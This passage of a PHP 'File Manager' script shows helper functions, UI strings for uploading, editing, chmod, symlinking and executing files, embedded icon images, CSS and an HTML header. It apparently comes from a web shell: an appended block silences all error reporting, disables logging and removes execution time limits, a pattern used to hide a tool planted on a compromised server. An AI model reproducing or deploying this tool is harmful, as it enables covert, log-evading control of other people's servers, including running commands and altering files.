614 <input type="reset" value="' . word('reset') . '" id="red_button" style="margin-left: 50px" />
615</td></tr></table>
616<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p></form>';
617 html_footer();
618 } function spacer () { global $cols;
619 echo '<tr><td colspan="' . $cols . '" style="height: 1em"></td></tr>';
620 } function textfieldsize ($content) { $size = strlen($content) + 5;
621 if ($size < 30) $size = 30;
622 return $size;
623 } function request_dump () { foreach ($_REQUEST as $key => $value) { echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
624 } } function html ($string) { global $site_charset;
625 return htmlentities($string, ENT_COMPAT, $site_charset);
626 } function word ($word) { global $words, $word_charset;
627 return htmlentities($words[$word], ENT_COMPAT, $word_charset);
628 } function phrase ($phrase, $arguments) { global $words;
629 static $search;
630 if (!is_array($search)) for ($i = 1;
631 $i <= 8;
632 $i++) $search[] = "%$i";
633 for ($i = 0;
634 $i < sizeof($arguments);
635 $i++) { $arguments[$i] = nl2br(html($arguments[$i]));
636 } $replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
637 return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
638 } function getwords ($lang) { global $word_charset, $date_format;
639 $date_format = 'n/j/y H:i:s';
640 $word_charset = 'ISO-8859-1';
641 return array( 'directory' => 'Directory', 'file' => 'File', 'newname' => 'New name', 'filename' => 'File name', 'size' => 'Size', 'permission' => 'Permission', 'owner' => 'Owner', 'group' => 'Group', 'other' => 'Others', 'functions' => 'Functions', 'read' => 'Read', 'write' => 'Write', 'execute' => 'Execute', 'create_symlink' => 'Create symlink', 'delete' => 'Delete', 'rename' => 'Rename', 'move' => 'Move', 'copy' => 'Copy', 'edit' => 'Edit', 'download' => 'Download', 'upload' => 'Upload', 'create' => 'Create', 'change' => 'Change', 'save' => 'Save', 'set' => 'Set', 'reset' => 'Reset', 'relative' => 'Relative path to target', 'yes' => 'Yes', 'no' => 'No', 'back' => 'Back', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'No output', 'user' => 'User', 'password' => 'Password', 'add' => 'Add', 'add_basic_auth' => 'Add basic-authentification', 'uploaded' => '"[%1]" has been uploaded.', 'not_uploaded' => '"[%1]" could not be uploaded.', 'already_exists' => '"[%1]" already exists.', 'created' => '"[%1]" has been created.', 'not_created' => '"[%1]" could not be created.', 'really_delete' => 'Delete these files?', 'deleted' => "These files have been deleted:\n[%1]", 'not_deleted' => "These files could not be deleted:\n[%1]", 'rename_file' => 'Rename file:', 'renamed' => '"[%1]" has been renamed to "[%2]".', 'not_renamed' => '"[%1] could not be renamed to "[%2]".', 'move_files' => 'Move these files:', 'moved' => "These files have been moved to \"[%2]\":\n[%1]", 'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]", 'copy_files' => 'Copy these files:', 'copied' => "These files have been copied to \"[%2]\":\n[%1]", 'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]", 'not_edited' => '"[%1]" can not be edited.', 'executed' => "\"[%1]\" has been executed successfully:\n{%2}", 'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}", 'saved' => '"[%1]" has been saved.', 'not_saved' => '"[%1]" could not be saved.', 'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.', 'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.', 'permission_for' => 'Permission of "[%1]":', 'permission_set' => 'Permission of "[%1]" was set to [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" can not be read.' );
642 } function getimage ($image) { switch ($image) { case 'file': return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
643 case 'folder': return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
644 case 'hidden_file': return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
645 case 'link': return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
646 case 'smiley': return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
647 case 'arrow': return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
648 } } function html_header () { global $site_charset;
649 echo <<<END
650<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
651 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
652<html xmlns="http://www.w3.org/1999/xhtml">
653<head>
654<meta http-equiv="Content-Type" content="text/html;
655 charset=$site_charset" />
656<title>File Manager</title>
657<style type="text/css">
658body { font-size: 18px;
659 text-align: center;
660 background-color: #CCC;
661 }
662img { width: 17px;
663 height: 13px }
664a, a:visited { text-decoration: none;
665 color: blue;
666 }
667hr { border-style: none;
668 height: 1px;
669 background-color: silver;
670 color: silver }
671#main { width: 1024px;
672 border: 1px solid #000000;
673 margin-top: 6pt;
674 margin-left: auto;
675 margin-right: auto;
676 border-spacing: 3px;
677}
678#main th { background: #eee;
679 padding: 3pt 3pt 0pt 3pt }
680.listing th, .listing td { padding: 1px 3pt 0 3pt }
681.listing th { border: 1px solid silver }
682.listing td { border: 1px solid #BFBFBF;
683 }
684.listing .checkbox { text-align: center }
685.listing .filename { text-align: left }
686.listing .size { text-align: right }
687.listing th.permission { text-align: left }
688.listing td.permission { font-family: monospace }
689.listing .owner { text-align: center;
690 }
691.listing .group { text-align: center }
692.listing .functions { text-align: center }
693.listing_footer td { background: #eee;
694 border: 1px solid silver }
695#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left;
696 padding: 3pt }
697#directory { border: 1px solid #000000;
698 height: 50px;
699 }
700#upload { border: 1px solid #000000;
701 height: 50px;
702 }
703#create { border: 1px solid #000000;
704 height: 50px;
705 }
706textarea { border: none;
707 background: white }
708table.dialog { margin-left: auto;
709 margin-right: auto }
710td.dialog { background: #eee;
711 padding: 1ex;
712 border: 1px solid silver;
713 text-align: center }
714#permission { margin-left: auto;
715 margin-right: auto }
716#permission td { padding-left: 3pt;
717 padding-right: 3pt;
718 text-align: center }
719td.permission_action { text-align: right }
720#symlink { background: #eee;
721 border: 1px solid silver }
722#symlink td { text-align: left;
723 padding: 3pt }
724#red_button { width: 120px;
725 color: #400 }
726#green_button { width: 120px;
727 color: #040 }
728#error td { background: maroon;
729 color: white;
730 border: 1px solid silver }
731#notice td { background: green;
732 color: white;
733 border: 1px solid silver }
734#notice pre, #error pre { background: silver;
735 color: black;
736 padding: 1ex;
737 margin-left: 1ex;
738 margin-right: 1ex }
739code { font-size: 12pt }
740td { white-space: nowrap;
741}
742.titleContent td { border: 1px solid #ddd;
743 background: #999999;
744 }
745#tblContent { width: 1024px;
746 margin-top: 10pt;
747 margin-left: auto;
748 margin-right: auto;
749 border: 1px solid #000000;
750 border-spacing: 0px;
751 }
752#tblContent tr { background: #FAFAFA;
753 }
754#tblContent tr:hover{ background-color: #C8C8C8;
755 }
756input { font-size: 16px;
757 }
758select { font-size: 16px;
759 border: 1px solid #666;
760 height: 27px;
761 }
762#mytxt { border: 1px solid #666;
763 height: 27px;
764 }
765#mybtn { height: 32px;
766 font-weight: bold;
767 }
768.mytxtDirectory { width: 700px;
769 }
770.mybtnUpload { font-weight: bold;
771 }
772</style>
773
774<script type="text/javascript">
775<!--
776function activate (name) {
777 if (document && document.forms[0] && document.forms[0].elements['focus']) {
778 document.forms[0].elements['focus'].value = name;
779
780 }
781}
782//-->
783</script>
784
785</head>
786<body>
787END;
788} function html_footer () { echo <<<END
789</body>
790</html>
791END;
792} function notice ($phrase) { global $cols;
793 $args = func_get_args();
794 array_shift($args);
795 return '<tr id="notice"><td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td></tr>';
796 } function error ($phrase) { global $cols;
797 $args = func_get_args();
798 array_shift($args);
799 return '<tr id="error">
800 <td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td></tr>';
801 }
802?>
803
804
805
806<?php @session_start();
807 @error_reporting(0);
808 @ini_set('error_log',NULL);
809 @ini_set('log_errors',0);
810 @ini_set('max_execution_time',0);
811 @ini_set('display_errors', 0);
812 @ini_set('output_buffering',0);
813 @set_time_limit(0);
814 @set_magic_quotes_runtime(0);
815
816?>